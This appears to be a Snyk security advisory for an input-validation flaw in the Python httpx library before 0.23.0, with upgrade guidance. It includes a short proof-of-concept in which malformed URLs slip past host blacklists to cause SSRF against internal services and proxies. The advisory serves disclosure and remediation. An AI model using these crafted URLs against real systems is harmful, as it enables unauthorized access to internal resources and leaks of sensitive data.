Improper Input Validation Affecting httpx Open this link in a new tab package, versions [,0.23.0)
Exploit Maturity
Proof of concept
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications-
snyk-id
SNYK-PYTHON-HTTPX-2772742
-
published
13 May 2022
-
disclosed
21 Apr 2022
-
credit
lebr0nli
Introduced: 21 Apr 2022
CWE-20 Open this link in a new tabHow to fix?
Upgrade httpx
to version 0.23.0 or higher.
Overview
httpx is a The next generation HTTP client.
Affected versions of this package are vulnerable to Improper Input Validation due to improper implementation of httpx.URL().copy_with
, that causes httpx.Client
and httpx.Proxy
to parse wrong URL. Exploiting this vulnerability leads to blacklist bypass.
PoC:
httpx.Client
user_input_from_http_request = 'http:////admin-dashboard/secret'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'admin-dashboard'
resp = httpx.Client(base_url=u).get('/') # SSRF to http://admin-dashboard/secret
print(resp.text) # sensitive data leak
httpx.Proxy
user_input_from_http_request = 'http://x@//internal-proxy:8082/'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'internal-proxy'
# httpx.Proxy(u).url.netloc == b'internal-proxy:8082'
resp = httpx.Client(proxies=u).get('/') # will request via http proxy at internal-proxy:8082